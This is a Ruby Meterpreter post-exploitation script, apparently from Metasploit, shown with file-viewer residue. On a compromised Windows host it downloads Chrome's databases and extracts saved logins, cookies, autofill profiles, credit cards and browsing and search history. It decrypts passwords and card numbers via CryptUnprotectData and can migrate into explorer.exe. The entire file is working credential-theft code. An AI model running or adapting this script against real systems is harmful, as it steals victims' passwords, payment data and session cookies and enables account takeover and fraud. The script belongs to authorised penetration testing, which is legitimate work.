238 lines
7.9 KiB
Ruby
238 lines
7.9 KiB
Ruby
#
|
|
# Script to extract data from a chrome installation.
|
|
#
|
|
# Author: Sven Taute <sven dot taute at gmail com>
|
|
#
|
|
|
|
require 'sqlite3'
|
|
require 'yaml'
|
|
|
|
if client.platform !~ /win32/
|
|
print_error("This version of Meterpreter is not supported with this Script!")
|
|
raise Rex::Script::Completed
|
|
end
|
|
@host_info = client.sys.config.sysinfo
|
|
@chrome_files = [
|
|
{ :in_file => "Web Data", :sql => "select * from autofill;", :out_file => "autofill"},
|
|
{ :in_file => "Web Data", :sql => "SELECT username_value,origin_url,signon_realm FROM logins;", :out_file => "user_site"},
|
|
{ :in_file => "Web Data", :sql => "select * from autofill_profiles;", :out_file => "autofill_profiles"},
|
|
{ :in_file => "Web Data", :sql => "select * from credit_cards;", :out_file => "autofill_credit_cards", :encrypted_fields => ["card_number_encrypted"]},
|
|
{ :in_file => "Cookies", :sql => "select * from cookies;", :out_file => "cookies"},
|
|
{ :in_file => "History", :sql => "select * from urls;", :out_file => "url_history"},
|
|
{ :in_file => "History", :sql => "SELECT url FROM downloads;", :out_file => "download_history"},
|
|
{ :in_file => "History", :sql => "SELECT term FROM keyword_search_terms;", :out_file => "search_history"},
|
|
{ :in_file => "Login Data", :sql => "select * from logins;", :out_file => "logins", :encrypted_fields => ["password_value"]},
|
|
{ :in_file => "Bookmarks", :sql => nil, :out_file => "bookmarks.json"},
|
|
{ :in_file => "Preferences", :sql => nil, :out_file => "preferences.json"},
|
|
]
|
|
@migrate = false
|
|
@old_pid = nil
|
|
@output_format = []
|
|
|
|
opts = Rex::Parser::Arguments.new(
|
|
"-h" => [ false, "Help menu" ],
|
|
"-m" => [ false, "Migrate into explorer.exe"],
|
|
"-f" => [ true, "Output format: j[son], y[aml], t[ext]. Defaults to json"]
|
|
)
|
|
|
|
opts.parse(args) { |opt, idx, val|
|
|
case opt
|
|
when "-m"
|
|
@migrate = true
|
|
when "-f"
|
|
if val =~ /^j(son)?$/
|
|
@output_format << "json"
|
|
elsif val =~ /^y(aml)?$/
|
|
@output_format << "yaml"
|
|
elsif val =~ /^t(ext)?$/
|
|
@output_format << "text"
|
|
else
|
|
print_error("unknown format '#{val}'.")
|
|
raise Rex::Script::Completed
|
|
end
|
|
when "-h"
|
|
print_line("")
|
|
print_line("DESCRIPTION: Script for enumerating preferences and extracting")
|
|
print_line("information from the Google Chrome Browser on a target system.")
|
|
print_line("Decryption of creditcard information and passwords only supported")
|
|
print_line("on 32bit Windows Operating Systems.")
|
|
print_line("")
|
|
print_line("USAGE: run enum_chrome [-m]")
|
|
print_line(opts.usage)
|
|
raise Rex::Script::Completed
|
|
end
|
|
}
|
|
|
|
@output_format << "json" if @output_format.empty?
|
|
if @output_format.include?("json")
|
|
begin
|
|
require 'json'
|
|
rescue LoadError
|
|
print_error("JSON is not available.")
|
|
@output_format.delete("json")
|
|
if @output_format.empty?
|
|
print_status("Falling back to raw text output.")
|
|
@output_format << "text"
|
|
end
|
|
end
|
|
end
|
|
print_status("using output format(s): " + @output_format.join(", "))
|
|
|
|
def prepare_railgun
|
|
rg = client.railgun
|
|
if (!rg.get_dll('crypt32'))
|
|
rg.add_dll('crypt32')
|
|
end
|
|
|
|
if (!rg.crypt32.functions["CryptUnprotectData"])
|
|
rg.add_function("crypt32", "CryptUnprotectData", "BOOL", [
|
|
["PBLOB","pDataIn", "in"],
|
|
["PWCHAR", "szDataDescr", "out"],
|
|
["PBLOB", "pOptionalEntropy", "in"],
|
|
["PDWORD", "pvReserved", "in"],
|
|
["PBLOB", "pPromptStruct", "in"],
|
|
["DWORD", "dwFlags", "in"],
|
|
["PBLOB", "pDataOut", "out"]
|
|
])
|
|
end
|
|
end
|
|
|
|
def decrypt_data(data)
|
|
rg = client.railgun
|
|
pid = client.sys.process.open.pid
|
|
process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
|
|
|
|
mem = process.memory.allocate(1024)
|
|
process.memory.write(mem, data)
|
|
|
|
addr = [mem].pack("V")
|
|
len = [data.length].pack("V")
|
|
ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8)
|
|
len, addr = ret["pDataOut"].unpack("V2")
|
|
return "" if len == 0
|
|
decrypted = process.memory.read(addr, len)
|
|
end
|
|
|
|
def write_output(file, rows)
|
|
if @output_format.include?("json")
|
|
::File.open(file + ".json", "w") { |f| f.write(JSON.pretty_generate(rows)) }
|
|
end
|
|
if @output_format.include?("yaml")
|
|
::File.open(file + ".yml", "w") { |f| f.write(JSON.pretty_generate(rows)) }
|
|
end
|
|
if @output_format.include?("text")
|
|
::File.open(file + ".txt", "w") do |f|
|
|
f.write(rows.first.keys.join("\t") + "\n")
|
|
f.write(rows.map { |e| e.values.map(&:inspect).join("\t") }.join("\n"))
|
|
end
|
|
end
|
|
end
|
|
|
|
def process_files(username)
|
|
@chrome_files.each do |item|
|
|
in_file = File.join(@log_dir, Rex::FileUtils.clean_path(username), item[:in_file])
|
|
out_file = File.join(@log_dir, Rex::FileUtils.clean_path(username), item[:out_file])
|
|
if item[:sql]
|
|
db = SQLite3::Database.new(in_file)
|
|
columns, *rows = db.execute2(item[:sql])
|
|
db.close
|
|
rows.map! do |row|
|
|
res = Hash[*columns.zip(row).flatten]
|
|
if item[:encrypted_fields] && client.sys.config.getuid != "NT AUTHORITY\\SYSTEM"
|
|
if @host_info['Architecture'] !~ /x64/
|
|
item[:encrypted_fields].each do |field|
|
|
print_good("decrypting field '#{field}'...")
|
|
res[field + "_decrypted"] = decrypt_data(res[field])
|
|
end
|
|
else
|
|
print_error("Can not decrypt #{item[:out_file]}, decryption only supported in 32bit OS")
|
|
end
|
|
end
|
|
res
|
|
end
|
|
if rows.length > 0
|
|
print_status("writing output '#{item[:out_file]}'...")
|
|
write_output(out_file, rows)
|
|
else
|
|
print_status("no '#{item[:out_file]}' data found in file '#{item[:in_file]}'")
|
|
end
|
|
else
|
|
::FileUtils.cp(in_file, out_file)
|
|
end
|
|
end
|
|
end
|
|
|
|
def extract_data(username)
|
|
chrome_path = @profiles_path + "\\" + username + @data_path
|
|
begin
|
|
client.fs.file.stat(chrome_path)
|
|
rescue
|
|
print_status("no files found for user '#{username}'")
|
|
return false
|
|
end
|
|
|
|
@chrome_files.map{ |e| e[:in_file] }.uniq.each do |f|
|
|
remote_path = chrome_path + '\\' + f
|
|
local_path = File.join(@log_dir, Rex::FileUtils.clean_path(username), f)
|
|
print_status("downloading file #{f} to '#{local_path}'...")
|
|
client.fs.file.download_file(local_path, remote_path)
|
|
end
|
|
return true
|
|
end
|
|
|
|
if @migrate
|
|
current_pid = client.sys.process.open.pid
|
|
target_pid = client.sys.process["explorer.exe"]
|
|
if target_pid != current_pid
|
|
@old_pid = current_pid
|
|
print_status("current PID is #{current_pid}. migrating into explorer.exe, PID=#{target_pid}...")
|
|
client.core.migrate(target_pid)
|
|
print_status("done.")
|
|
end
|
|
end
|
|
|
|
host = session.session_host
|
|
@log_dir = File.join(Msf::Config.log_directory, "scripts", "enum_chrome", Rex::FileUtils.clean_path(@host_info['Computer']), Time.now.strftime("%Y%m%d.%H%M"))
|
|
::FileUtils.mkdir_p(@log_dir)
|
|
|
|
sysdrive = client.sys.config.getenv('SYSTEMDRIVE')
|
|
os = @host_info['OS']
|
|
if os =~ /(Windows 7|2008|Vista)/
|
|
@profiles_path = sysdrive + "\\Users\\"
|
|
@data_path = "\\AppData\\Local\\Google\\Chrome\\User Data\\Default"
|
|
elsif os =~ /(2000|NET|XP)/
|
|
@profiles_path = sysdrive + "\\Documents and Settings\\"
|
|
@data_path = "\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default"
|
|
end
|
|
|
|
usernames = []
|
|
|
|
uid = client.sys.config.getuid
|
|
|
|
if is_system?
|
|
print_status "running as SYSTEM, extracting user list..."
|
|
print_status "(decryption of passwords and credit card numbers will not be possible)"
|
|
client.fs.dir.foreach(@profiles_path) do |u|
|
|
usernames << u if u !~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
|
|
end
|
|
print_status "users found: #{usernames.join(", ")}"
|
|
else
|
|
print_status "running as user '#{uid}'..."
|
|
usernames << client.sys.config.getenv('USERNAME')
|
|
prepare_railgun
|
|
end
|
|
|
|
usernames.each do |u|
|
|
print_status("extracting data for user '#{u}'...")
|
|
success = extract_data(u)
|
|
process_files(u) if success
|
|
end
|
|
|
|
if @migrate && @old_pid
|
|
print_status("migrating back into PID=#{@old_pid}...")
|
|
client.core.migrate(@old_pid)
|
|
print_status("done.")
|
|
end
|
|
|
|
raise Rex::Script::Completed
|